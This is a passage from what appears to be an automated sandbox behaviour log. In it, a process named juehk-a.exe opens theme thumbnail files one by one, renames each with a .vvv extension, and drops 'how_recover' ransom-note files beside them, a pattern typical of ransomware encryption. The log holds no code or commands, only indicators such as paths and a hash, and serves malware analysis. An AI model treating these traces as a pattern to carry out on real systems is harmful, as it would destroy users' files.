23304.          processinfo:
23305.            pid: 1648
23306.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23307.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23308.            ads:
23309.          fid (ads:): 562949953521331
23310.          ntstatus: 0x0
23311.          CreateOptions: 0x60
23312.        file:
23313.          timestamp: 87359
23314.          mode: created
23315.          sequenceNumber: 1636
23316.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\REFINED\how_recover+deg.html
23317.          processinfo:
23318.            pid: 1648
23319.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23320.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23321.            ads:
23322.          fid (ads:): 562949953521332
23323.          ntstatus: 0x0
23324.          CreateOptions: 0x60
23325.        file:
23326.          timestamp: 87406
23327.          mode: open
23328.          sequenceNumber: 1637
23329.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RICEPAPR\THMBNAIL.PNG
23330.          filesize: 53115
23331.          processinfo:
23332.            pid: 1648
23333.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23334.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23335.            ads:
23336.          fid (ads:): 562949953499640
23337.          ntstatus: 0x0
23338.          CreateOptions: 0x60
23339.        file:
23340.          timestamp: 87494
23341.          mode: rename
23342.          sequenceNumber: 1638
23343.          filesize: 53534
23344.          processinfo:
23345.            pid: 1648
23346.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23347.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23348.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RICEPAPR\THMBNAIL.PNG
23349.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RICEPAPR\THMBNAIL.PNG.vvv
23350.            ads:
23351.          fid (ads:): 562949953499640
23352.          ntstatus: 0x0
23353.          CreateOptions: 0x0
23354.        file:
23355.          timestamp: 87525
23356.          mode: created
23357.          sequenceNumber: 1639
23358.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RICEPAPR\how_recover+deg.txt
23359.          processinfo:
23360.            pid: 1648
23361.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23362.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23363.            ads:
23364.          fid (ads:): 562949953521333
23365.          ntstatus: 0x0
23366.          CreateOptions: 0x60
23367.        file:
23368.          timestamp: 87530
23369.          mode: created
23370.          sequenceNumber: 1640
23371.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RICEPAPR\how_recover+deg.html
23372.          processinfo:
23373.            pid: 1648
23374.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23375.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23376.            ads:
23377.          fid (ads:): 562949953521334
23378.          ntstatus: 0x0
23379.          CreateOptions: 0x60
23380.        file:
23381.          timestamp: 87534
23382.          mode: open
23383.          sequenceNumber: 1641
23384.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RIPPLE\THMBNAIL.PNG
23385.          filesize: 31975
23386.          processinfo:
23387.            pid: 1648
23388.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23389.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23390.            ads:
23391.          fid (ads:): 562949953499641
23392.          ntstatus: 0x0
23393.          CreateOptions: 0x60
23394.        apicall:
23395.          timestamp: 87562
23396.          repeat: 7000
23397.          sequenceNumber: 1642
23398.          processinfo:
23399.            pid: 1648
23400.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23401.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23402.          dllname: kernel32.dll
23403.          apiname: Sleep
23404.          address: 0x0041ed5b
23405.        file:
23406.          timestamp: 87671
23407.          mode: rename
23408.          sequenceNumber: 1643
23409.          filesize: 32398
23410.          processinfo:
23411.            pid: 1648
23412.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23413.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23414.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RIPPLE\THMBNAIL.PNG
23415.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RIPPLE\THMBNAIL.PNG.vvv
23416.            ads:
23417.          fid (ads:): 562949953499641
23418.          ntstatus: 0x0
23419.          CreateOptions: 0x0
23420.        file:
23421.          timestamp: 87689
23422.          mode: created
23423.          sequenceNumber: 1644
23424.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RIPPLE\how_recover+deg.txt
23425.          processinfo:
23426.            pid: 1648
23427.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23428.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23429.            ads:
23430.          fid (ads:): 562949953521335
23431.          ntstatus: 0x0
23432.          CreateOptions: 0x60
23433.        file:
23434.          timestamp: 87699
23435.          mode: created
23436.          sequenceNumber: 1645
23437.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RIPPLE\how_recover+deg.html
23438.          processinfo:
23439.            pid: 1648
23440.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23441.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23442.            ads:
23443.          fid (ads:): 562949953521336
23444.          ntstatus: 0x0
23445.          CreateOptions: 0x60
23446.        file:
23447.          timestamp: 87706
23448.          mode: open
23449.          sequenceNumber: 1646
23450.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RMNSQUE\THMBNAIL.PNG
23451.          filesize: 47962
23452.          processinfo:
23453.            pid: 1648
23454.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23455.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23456.            ads:
23457.          fid (ads:): 562949953499642
23458.          ntstatus: 0x0
23459.          CreateOptions: 0x60
23460.        file:
23461.          timestamp: 87717
23462.          mode: rename
23463.          sequenceNumber: 1647
23464.          filesize: 48382
23465.          processinfo:
23466.            pid: 1648
23467.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23468.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23469.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RMNSQUE\THMBNAIL.PNG
23470.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RMNSQUE\THMBNAIL.PNG.vvv
23471.            ads:
23472.          fid (ads:): 562949953499642
23473.          ntstatus: 0x0
23474.          CreateOptions: 0x0
23475.        file:
23476.          timestamp: 87744
23477.          mode: created
23478.          sequenceNumber: 1648
23479.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RMNSQUE\how_recover+deg.txt
23480.          processinfo:
23481.            pid: 1648
23482.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23483.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23484.            ads:
23485.          fid (ads:): 562949953521337
23486.          ntstatus: 0x0
23487.          CreateOptions: 0x60
23488.        file:
23489.          timestamp: 87749
23490.          mode: created
23491.          sequenceNumber: 1649
23492.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RMNSQUE\how_recover+deg.html
23493.          processinfo:
23494.            pid: 1648
23495.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23496.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23497.            ads:
23498.          fid (ads:): 562949953521338
23499.          ntstatus: 0x0
23500.          CreateOptions: 0x60
23501.        file:
23502.          timestamp: 87755
23503.          mode: open
23504.          sequenceNumber: 1650
23505.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SATIN\THMBNAIL.PNG
23506.          filesize: 34163
23507.          processinfo:
23508.            pid: 1648
23509.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23510.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23511.            ads:
23512.          fid (ads:): 562949953499643
23513.          ntstatus: 0x0
23514.          CreateOptions: 0x60
23515.        file:
23516.          timestamp: 87765
23517.          mode: rename
23518.          sequenceNumber: 1651
23519.          filesize: 34590
23520.          processinfo:
23521.            pid: 1648
23522.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23523.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23524.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SATIN\THMBNAIL.PNG
23525.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SATIN\THMBNAIL.PNG.vvv
23526.            ads:
23527.          fid (ads:): 562949953499643
23528.          ntstatus: 0x0
23529.          CreateOptions: 0x0
23530.        file:
23531.          timestamp: 87786
23532.          mode: created
23533.          sequenceNumber: 1652
23534.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SATIN\how_recover+deg.txt
23535.          processinfo:
23536.            pid: 1648
23537.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23538.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23539.            ads:
23540.          fid (ads:): 562949953521339
23541.          ntstatus: 0x0
23542.          CreateOptions: 0x60
23543.        file:
23544.          timestamp: 87793
23545.          mode: created
23546.          sequenceNumber: 1653
23547.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SATIN\how_recover+deg.html
23548.          processinfo:
23549.            pid: 1648
23550.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23551.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23552.            ads:
23553.          fid (ads:): 562949953521340
23554.          ntstatus: 0x0
23555.          CreateOptions: 0x60
23556.        file:
23557.          timestamp: 87800
23558.          mode: open
23559.          sequenceNumber: 1654
23560.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SKY\THMBNAIL.PNG
23561.          filesize: 29305
23562.          processinfo:
23563.            pid: 1648
23564.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23565.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23566.            ads:
23567.          fid (ads:): 562949953499644
23568.          ntstatus: 0x0
23569.          CreateOptions: 0x60
23570.        file:
23571.          timestamp: 87810
23572.          mode: rename
23573.          sequenceNumber: 1655
23574.          filesize: 29726
23575.          processinfo:
23576.            pid: 1648
23577.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23578.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23579.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SKY\THMBNAIL.PNG
23580.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SKY\THMBNAIL.PNG.vvv
23581.            ads:
23582.          fid (ads:): 562949953499644
23583.          ntstatus: 0x0
23584.          CreateOptions: 0x0
23585.        file:
23586.          timestamp: 87819
23587.          mode: created
23588.          sequenceNumber: 1656
23589.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SKY\how_recover+deg.txt
23590.          processinfo:
23591.            pid: 1648
23592.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23593.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23594.            ads:
23595.          fid (ads:): 562949953521341
23596.          ntstatus: 0x0
23597.          CreateOptions: 0x60
23598.        file:
23599.          timestamp: 87825
23600.          mode: created
23601.          sequenceNumber: 1657
23602.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SKY\how_recover+deg.html
23603.          processinfo:
23604.            pid: 1648
23605.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23606.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23607.            ads:
23608.          fid (ads:): 562949953521342
23609.          ntstatus: 0x0
23610.          CreateOptions: 0x60
23611.        file:
23612.          timestamp: 87832
23613.          mode: open
23614.          sequenceNumber: 1658
23615.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SLATE\THMBNAIL.PNG
23616.          filesize: 27177
23617.          processinfo:
23618.            pid: 1648
23619.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23620.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23621.            ads:
23622.          fid (ads:): 562949953499645
23623.          ntstatus: 0x0
23624.          CreateOptions: 0x60
23625.        file:
23626.          timestamp: 87842
23627.          mode: rename
23628.          sequenceNumber: 1659
23629.          filesize: 27598
23630.          processinfo:
23631.            pid: 1648
23632.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23633.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23634.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SLATE\THMBNAIL.PNG
23635.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SLATE\THMBNAIL.PNG.vvv
23636.            ads:
23637.          fid (ads:): 562949953499645
23638.          ntstatus: 0x0
23639.          CreateOptions: 0x0
23640.        file:
23641.          timestamp: 87851
23642.          mode: created
23643.          sequenceNumber: 1660
23644.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SLATE\how_recover+deg.txt
23645.          processinfo:
23646.            pid: 1648
23647.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23648.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23649.            ads:
23650.          fid (ads:): 562949953521343
23651.          ntstatus: 0x0
23652.          CreateOptions: 0x60
23653.        file:
23654.          timestamp: 87857
23655.          mode: created
23656.          sequenceNumber: 1661
23657.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SLATE\how_recover+deg.html
23658.          processinfo:
23659.            pid: 1648
23660.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23661.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23662.            ads:
23663.          fid (ads:): 562949953521344
23664.          ntstatus: 0x0
23665.          CreateOptions: 0x60
23666.        file:
23667.          timestamp: 87863
23668.          mode: open
23669.          sequenceNumber: 1662
23670.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SONORA\THMBNAIL.PNG
23671.          filesize: 21812
23672.          processinfo:
23673.            pid: 1648
23674.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23675.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23676.            ads:
23677.          fid (ads:): 562949953499646
23678.          ntstatus: 0x0
23679.          CreateOptions: 0x60
23680.        file:
23681.          timestamp: 87873
23682.          mode: rename
23683.          sequenceNumber: 1663
23684.          filesize: 22238
23685.          processinfo:
23686.            pid: 1648
23687.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23688.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23689.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SONORA\THMBNAIL.PNG
23690.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SONORA\THMBNAIL.PNG.vvv
23691.            ads:
23692.          fid (ads:): 562949953499646
23693.          ntstatus: 0x0
23694.          CreateOptions: 0x0
23695.        file:
23696.          timestamp: 87898
23697.          mode: created
23698.          sequenceNumber: 1664
23699.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SONORA\how_recover+deg.txt
23700.          processinfo:
23701.            pid: 1648
23702.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23703.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23704.            ads:
23705.          fid (ads:): 562949953521345
23706.          ntstatus: 0x0
23707.          CreateOptions: 0x60
23708.        file:
23709.          timestamp: 87904
23710.          mode: created
23711.          sequenceNumber: 1665
23712.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SONORA\how_recover+deg.html
23713.          processinfo:
23714.            pid: 1648
23715.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23716.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23717.            ads:
23718.          fid (ads:): 562949953521346
23719.          ntstatus: 0x0
23720.          CreateOptions: 0x60
23721.        file:
23722.          timestamp: 87912
23723.          mode: open
23724.          sequenceNumber: 1666
23725.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SPRING\THMBNAIL.PNG
23726.          filesize: 19525
23727.          processinfo:
23728.            pid: 1648
23729.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23730.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23731.            ads:
23732.          fid (ads:): 562949953499647
23733.          ntstatus: 0x0
23734.          CreateOptions: 0x60
23735.        file:
23736.          timestamp: 87922
23737.          mode: rename
23738.          sequenceNumber: 1667
23739.          filesize: 19950
23740.          processinfo:
23741.            pid: 1648
23742.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23743.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23744.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SPRING\THMBNAIL.PNG
23745.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SPRING\THMBNAIL.PNG.vvv
23746.            ads:
23747.          fid (ads:): 562949953499647
23748.          ntstatus: 0x0
23749.          CreateOptions: 0x0
23750.        file:
23751.          timestamp: 87932
23752.          mode: created
23753.          sequenceNumber: 1668
23754.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SPRING\how_recover+deg.txt
23755.          processinfo:
23756.            pid: 1648
23757.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23758.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23759.            ads:
23760.          fid (ads:): 562949953521347
23761.          ntstatus: 0x0
23762.          CreateOptions: 0x60
23763.        file:
23764.          timestamp: 87941
23765.          mode: created
23766.          sequenceNumber: 1669
23767.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SPRING\how_recover+deg.html
23768.          processinfo:
23769.            pid: 1648
23770.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23771.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23772.            ads:
23773.          fid (ads:): 562949953521348
23774.          ntstatus: 0x0
23775.          CreateOptions: 0x60
23776.        file:
23777.          timestamp: 87946
23778.          mode: open
23779.          sequenceNumber: 1670
23780.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\STRTEDGE\THMBNAIL.PNG
23781.          filesize: 33479
23782.          processinfo:
23783.            pid: 1648
23784.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23785.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23786.            ads:
23787.          fid (ads:): 562949953499648
23788.          ntstatus: 0x0
23789.          CreateOptions: 0x60
23790.        file:
23791.          timestamp: 87956
23792.          mode: rename
23793.          sequenceNumber: 1671
23794.          filesize: 33902
23795.          processinfo:
23796.            pid: 1648
23797.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23798.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23799.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\STRTEDGE\THMBNAIL.PNG
23800.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\STRTEDGE\THMBNAIL.PNG.vvv
23801.            ads:
23802.          fid (ads:): 562949953499648
23803.          ntstatus: 0x0
23804.          CreateOptions: 0x0
23805.        file:
23806.          timestamp: 87965
23807.          mode: created
23808.          sequenceNumber: 1672
23809.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\STRTEDGE\how_recover+deg.txt
23810.          processinfo:
23811.            pid: 1648
23812.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23813.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23814.            ads:
23815.          fid (ads:): 562949953521349
23816.          ntstatus: 0x0
23817.          CreateOptions: 0x60
23818.        file:
23819.          timestamp: 87971
23820.          mode: created
23821.          sequenceNumber: 1673
23822.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\STRTEDGE\how_recover+deg.html
23823.          processinfo:
23824.            pid: 1648
23825.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23826.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23827.            ads:
23828.          fid (ads:): 562949953521350
23829.          ntstatus: 0x0
23830.          CreateOptions: 0x60
23831.        file:
23832.          timestamp: 87978
23833.          mode: open
23834.          sequenceNumber: 1674
23835.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\STUDIO\THMBNAIL.PNG
23836.          filesize: 18380
23837.          processinfo:
23838.            pid: 1648
23839.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23840.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23841.            ads:
23842.          fid (ads:): 562949953499649
23843.          ntstatus: 0x0
23844.          CreateOptions: 0x60
23845.        file:
23846.          timestamp: 87988
23847.          mode: rename
23848.          sequenceNumber: 1675
23849.          filesize: 18798
23850.          processinfo:
23851.            pid: 1648
23852.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23853.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23854.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\STUDIO\THMBNAIL.PNG
23855.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\STUDIO\THMBNAIL.PNG.vvv
23856.            ads:
23857.          fid (ads:): 562949953499649
23858.          ntstatus: 0x0
23859.          CreateOptions: 0x0
23860.        file:
23861.          timestamp: 88014
23862.          mode: created
23863.          sequenceNumber: 1676
23864.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\STUDIO\how_recover+deg.txt
23865.          processinfo:
23866.            pid: 1648
23867.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23868.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23869.            ads:
23870.          fid (ads:): 562949953521351
23871.          ntstatus: 0x0
23872.          CreateOptions: 0x60
23873.        file:
23874.          timestamp: 88020
23875.          mode: created
23876.          sequenceNumber: 1677
23877.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\STUDIO\how_recover+deg.html
23878.          processinfo:
23879.            pid: 1648
23880.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23881.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23882.            ads:
23883.          fid (ads:): 562949953521352
23884.          ntstatus: 0x0
23885.          CreateOptions: 0x60
23886.        file:
23887.          timestamp: 88027
23888.          mode: open
23889.          sequenceNumber: 1678
23890.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SUMIPNTG\THMBNAIL.PNG
23891.          filesize: 44302
23892.          processinfo:
23893.            pid: 1648
23894.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23895.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23896.            ads:
23897.          fid (ads:): 562949953499650
23898.          ntstatus: 0x0
23899.          CreateOptions: 0x60
23900.        file:
23901.          timestamp: 88037
23902.          mode: rename
23903.          sequenceNumber: 1679
23904.          filesize: 44718
23905.          processinfo:
23906.            pid: 1648
23907.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23908.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23909.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SUMIPNTG\THMBNAIL.PNG
23910.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SUMIPNTG\THMBNAIL.PNG.vvv
23911.            ads:
23912.          fid (ads:): 562949953499650
23913.          ntstatus: 0x0
23914.          CreateOptions: 0x0
23915.        file:
23916.          timestamp: 88057
23917.          mode: created
23918.          sequenceNumber: 1680
23919.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SUMIPNTG\how_recover+deg.txt
23920.          processinfo:
23921.            pid: 1648
23922.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23923.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23924.            ads:
23925.          fid (ads:): 562949953521353
23926.          ntstatus: 0x0
23927.          CreateOptions: 0x60
23928.        file:
23929.          timestamp: 88063
23930.          mode: created
23931.          sequenceNumber: 1681
23932.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SUMIPNTG\how_recover+deg.html
23933.          processinfo:
23934.            pid: 1648
23935.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23936.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23937.            ads:
23938.          fid (ads:): 562949953521354
23939.          ntstatus: 0x0
23940.          CreateOptions: 0x60
23941.        file:
23942.          timestamp: 88068
23943.          mode: open
23944.          sequenceNumber: 1682
23945.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\WATER\THMBNAIL.PNG
23946.          filesize: 42453
23947.          processinfo:
23948.            pid: 1648
23949.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23950.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23951.            ads:
23952.          fid (ads:): 562949953499651
23953.          ntstatus: 0x0
23954.          CreateOptions: 0x60
23955.        file:
23956.          timestamp: 88077
23957.          mode: rename
23958.          sequenceNumber: 1683
23959.          filesize: 42878
23960.          processinfo:
23961.            pid: 1648
23962.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23963.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23964.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\WATER\THMBNAIL.PNG
23965.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\WATER\THMBNAIL.PNG.vvv
23966.            ads:
23967.          fid (ads:): 562949953499651
23968.          ntstatus: 0x0
23969.          CreateOptions: 0x0
23970.        file:
23971.          timestamp: 88127
23972.          mode: created
23973.          sequenceNumber: 1684
23974.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\WATER\how_recover+deg.txt
23975.          processinfo:
23976.            pid: 1648
23977.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23978.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23979.            ads:
23980.          fid (ads:): 562949953521355
23981.          ntstatus: 0x0
23982.          CreateOptions: 0x60
23983.        file:
23984.          timestamp: 88133
23985.          mode: created
23986.          sequenceNumber: 1685
23987.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\WATER\how_recover+deg.html
23988.          processinfo:
23989.            pid: 1648
23990.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
23991.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
23992.            ads:
23993.          fid (ads:): 562949953521356
23994.          ntstatus: 0x0
23995.          CreateOptions: 0x60
23996.        file:
23997.          timestamp: 88139
23998.          mode: open
23999.          sequenceNumber: 1686
24000.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\WATERMAR\THMBNAIL.PNG
24001.          filesize: 30170
24002.          processinfo:
24003.            pid: 1648
24004.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24005.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24006.            ads:
24007.          fid (ads:): 562949953499652
24008.          ntstatus: 0x0
24009.          CreateOptions: 0x60
24010.        file:
24011.          timestamp: 88149
24012.          mode: rename
24013.          sequenceNumber: 1687
24014.          filesize: 30590
24015.          processinfo:
24016.            pid: 1648
24017.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24018.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24019.          old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\WATERMAR\THMBNAIL.PNG
24020.          new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\WATERMAR\THMBNAIL.PNG.vvv
24021.            ads:
24022.          fid (ads:): 562949953499652
24023.          ntstatus: 0x0
24024.          CreateOptions: 0x0
24025.        file:
24026.          timestamp: 88176
24027.          mode: created
24028.          sequenceNumber: 1688
24029.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\WATERMAR\how_recover+deg.txt
24030.          processinfo:
24031.            pid: 1648
24032.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24033.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24034.            ads:
24035.          fid (ads:): 562949953521357
24036.          ntstatus: 0x0
24037.          CreateOptions: 0x60
24038.        file:
24039.          timestamp: 88183
24040.          mode: created
24041.          sequenceNumber: 1689
24042.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\WATERMAR\how_recover+deg.html
24043.          processinfo:
24044.            pid: 1648
24045.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24046.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24047.            ads:
24048.          fid (ads:): 562949953521358
24049.          ntstatus: 0x0
24050.          CreateOptions: 0x60
24051.        file:
24052.          timestamp: 88189
24053.          mode: created
24054.          sequenceNumber: 1690
24055.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\how_recover+deg.txt
24056.          processinfo:
24057.            pid: 1648
24058.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24059.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24060.            ads:
24061.          fid (ads:): 562949953521359
24062.          ntstatus: 0x0
24063.          CreateOptions: 0x60
24064.        file:
24065.          timestamp: 88195
24066.          mode: created
24067.          sequenceNumber: 1691
24068.          value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\how_recover+deg.html
24069.          processinfo:
24070.            pid: 1648
24071.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24072.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24073.            ads:
